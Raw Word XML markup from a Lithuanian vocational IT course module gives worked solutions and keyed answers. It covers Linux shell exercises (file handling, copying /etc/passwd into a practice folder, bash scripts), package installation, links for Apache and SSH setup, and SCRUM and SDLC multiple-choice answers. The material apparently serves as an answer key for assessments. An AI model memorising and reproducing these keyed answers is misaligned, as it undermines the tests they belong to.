    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:before="480" w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>1.2.</w:t>
      </w:r>
      <w:r w:rsidR="006057BB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="961" w:name="_Toc10444027"/>
      <w:bookmarkStart w:id="962" w:name="_Toc13095574"/>
      <w:bookmarkStart w:id="963" w:name="_Toc13833468"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Mokymosi rezultatas. Valdyti tarnybinę stotį naudojant jos komandinės eilutės sąsają ir jos pagrindines komandas</w:t>
      </w:r>
      <w:bookmarkEnd w:id="961"/>
      <w:bookmarkEnd w:id="962"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="963"/>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DARBAS LINUX OS KOMANDŲ EILUTĖJE</w:t>
      </w:r>
      <w:r w:rsidR="002163FC">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Sprendi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cd ~ , $ mkdir Bandy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touch f{1..4}.txt , $ touch ff{1..4}.tx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s Bandy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cd ~ , $ mkdir Tiksl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cp Bandymas/f1.txt Tikslas/ ir t.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s Tiksl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mv Tikslas/f1.txt Tikslas/file1.txt ir t.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mv Tikslas/file1.txt Bandymas/ ir t.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cp /etc/passwd Bandy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ess Bandymas/passwd</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ess Bandymas/passwd | grep roo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wc -m Bandymas/passwd</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head -n 5 Bandymas/passwd , $ tail -n 5 Bandymas/passwd</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n -s Bandymas/passwd Tikslas/passwd</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s Tiksl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rm Bandymas/passwd</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ls Tiksl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rm -dfr Bandymas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06"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xml:space="preserve">  SUKURTI BASH SCENARIJŲ</w:t>
      </w:r>
      <w:r w:rsidR="00784644">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Sprendi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bin/sh</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echo “vard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echo vardas | wc -m</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mkdir Pavarde</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cp /etc/passwd Pavarde/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:left="357" w:hanging="357"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="964" w:name="_Toc10444028"/>
      <w:bookmarkStart w:id="965" w:name="_Toc13095575"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="966" w:name="_Toc13833469"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Mokymosi rezultatas. Valdyti programinius paketus</w:t>
      </w:r>
      <w:bookmarkEnd w:id="964"/>
      <w:bookmarkEnd w:id="965"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="966"/>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LINUX OS PAKETŲ ADMINISTRAVIMAS</w:t>
      </w:r>
      <w:r w:rsidR="00A27956">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Sprendimas:</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apt-cache search xcowsay</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sudo apt-get install xcowsay</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aptitude install figle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xcowsay , $ figle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https://launchpad.net/~webupd8team/+archive/ubuntu/java</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sudo add-apt-repository ppa:webupd8team/java</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ind w:leftChars="100" w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>$ sudo apt-get install eclipse &amp;&amp; $ sudo apt-get install oracle-java8-installer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:spacing w:before="480" w:after="160"/>
        <w:ind w:left="357" w:hanging="357"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="967" w:name="_Toc10444029"/>
      <w:bookmarkStart w:id="968" w:name="_Toc13095576"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="969" w:name="_Toc13833470"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Mokymosi rezultatas, Naudoti Web serverio programinę įrangą HTTP bylų viešinimui</w:t>
      </w:r>
      <w:bookmarkEnd w:id="967"/>
      <w:bookmarkEnd w:id="968"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="969"/>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WEB SERVERIO DIEGIMAS IR KONFIGŪRAVIMAS</w:t>
      </w:r>
      <w:r w:rsidR="005970D0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Sprendimas – veiksmai atlikti pagal šias instrukcijas:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="005970D0" w:rsidP="00372B3A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:ind w:right="282" w:firstLine="420"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005970D0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>https://tutorials.ubuntu.com/tutorial/install-and-configure-apache#0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="005970D0" w:rsidP="00372B3A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:ind w:right="282" w:firstLine="420"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005970D0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>https://help.ubuntu.com/lts/serverguide/httpd.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="005970D0" w:rsidP="00372B3A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:ind w:right="282" w:firstLine="420"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005970D0">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>https://help.ubuntu.com/lts/serverguide/web-servers.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="006D6D69" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId166" w:history="1">
        <w:r w:rsidR="005970D0" w:rsidRPr="005970D0">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://howtoubuntu.org/how-to-install-lamp-on-ubuntu</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:spacing w:before="360" w:after="160"/>
        <w:ind w:left="357" w:hanging="357"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="970" w:name="_Toc10444030"/>
      <w:bookmarkStart w:id="971" w:name="_Toc13095577"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="972" w:name="_Toc13833471"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Mokymosi rezultatas. Valdyti tarnybines stotis per nuotolinę prieigą</w:t>
      </w:r>
      <w:bookmarkEnd w:id="970"/>
      <w:bookmarkEnd w:id="971"/>
      <w:bookmarkEnd w:id="972"/>
      <w:r w:rsidR="005970D0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>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NUOTOLINIS PRISIJUNGIMAS PRIE LINUX OS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="397" w:right="284"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Sprendimas – veiksmai atlikti pagal šias instrukcijas:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="397" w:right="284"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>https://help.ubuntu.com/lts/serverguide/openssh-server.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="397" w:right="284"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>https://help.ubuntu.com/lts/serverguide/openssh-server.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="397" w:right="284"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>https://help.ubuntu.com/lts/serverguide/openssh-server.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="006D6D69" w:rsidP="00372B3A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="397" w:right="284"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId167" w:history="1">
        <w:r w:rsidR="00D062C5" w:rsidRPr="005A7391">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://www.youtube.com/watch?v=tiPZGba2qJg</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:left="397" w:right="284"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000554ED" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="973" w:name="_Toc10444031"/>
      <w:bookmarkStart w:id="974" w:name="_Toc13095578"/>
      <w:bookmarkStart w:id="975" w:name="_Toc13833472"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Kompetencija. </w:t>
      </w:r>
      <w:r w:rsidR="00616C06" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Taikyti aktualias programinės įrangos kūrimo metodikas</w:t>
      </w:r>
      <w:bookmarkEnd w:id="973"/>
      <w:bookmarkEnd w:id="974"/>
      <w:bookmarkEnd w:id="975"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:spacing w:before="480" w:after="160"/>
        <w:ind w:left="357" w:hanging="357"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="976" w:name="_Toc10444032"/>
      <w:bookmarkStart w:id="977" w:name="_Toc13095579"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="978" w:name="_Toc13833473"/>
      <w:r w:rsidR="000554ED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Mokymosi rezultatas. </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Suprasti SCRUM proceso dalis ir komandos narių atsakomybes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="976"/>
      <w:bookmarkEnd w:id="977"/>
      <w:bookmarkEnd w:id="978"/>
      <w:r w:rsidR="000554ED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</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1 užduotis.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">  KAS YRA SPRINTO ĮSIPAREIGOJIMŲ SAVININKAS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2) Visa komanda kartu</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2 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. DAUG ŽMONIŲ MANO, KAD PROGRAMAVIMAS POROMIS (PAIR PROGRAMMING) MAŽINA KLAIDŲ SKAIČIŲ IR PALENGVINA KODO PRIEŽIŪRĄ. </w:t>
      </w:r>
      <w:r w:rsidR="000554ED" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Programavimas poromis - kas tai?</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2)  Du žmonės dalinasi viena darbo vieta (kompiuteriu) paprastai pasikeisdami paeiliui renka kodą ar atlieka veiksmus klaviatūra, kitas stebi, atkreipia dėmesį ir pad</w:t>
      </w:r>
      <w:r w:rsidR="00B85FE4" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>eda pirmą</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>jam</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3 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. WHAT IS THE RECOMMENDED SIZE OF A SCRUM TEAM?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4) 7 plus or minus 2</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4 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. KOKIA KASDIENIO SCRUM SUSITIKIMO (DAILY SCRUM MEETING) TRUKMĖ (TIME-BOX)?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3) 15 minučių</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5 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">.  IN AN ORGANIZATION THAT EMBRACES AGILE VALUES, WHO WOULD BE RESPONSIBLE FOR TOOL SELECTION AND CONFIGURATION?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1) The teams, who would have to coordinate with each other</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:spacing w:before="480" w:after="160"/>
        <w:ind w:left="357" w:hanging="357"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="979" w:name="_Toc10444033"/>
      <w:bookmarkStart w:id="980" w:name="_Toc13095580"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="981" w:name="_Toc13833474"/>
      <w:r w:rsidR="00D062C5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Mokymosi rezultatas. </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Analizuoti pateiktus reikalavimus, nustatant programos atitikimą reikalavimams</w:t>
      </w:r>
      <w:bookmarkEnd w:id="979"/>
      <w:bookmarkEnd w:id="980"/>
      <w:bookmarkEnd w:id="981"/>
      <w:r w:rsidR="00D062C5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="150"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>1 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. WHAT HAPPENS DURING THE REQUIREMENTS GATHERING AND ANALYSIS PHASE OF THE SOFTWARE DEVELOPMENT LIFECYCLE (SDLC)?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="150"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">(2) </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>The customer gives the expectations of the project</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2 užduotis.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
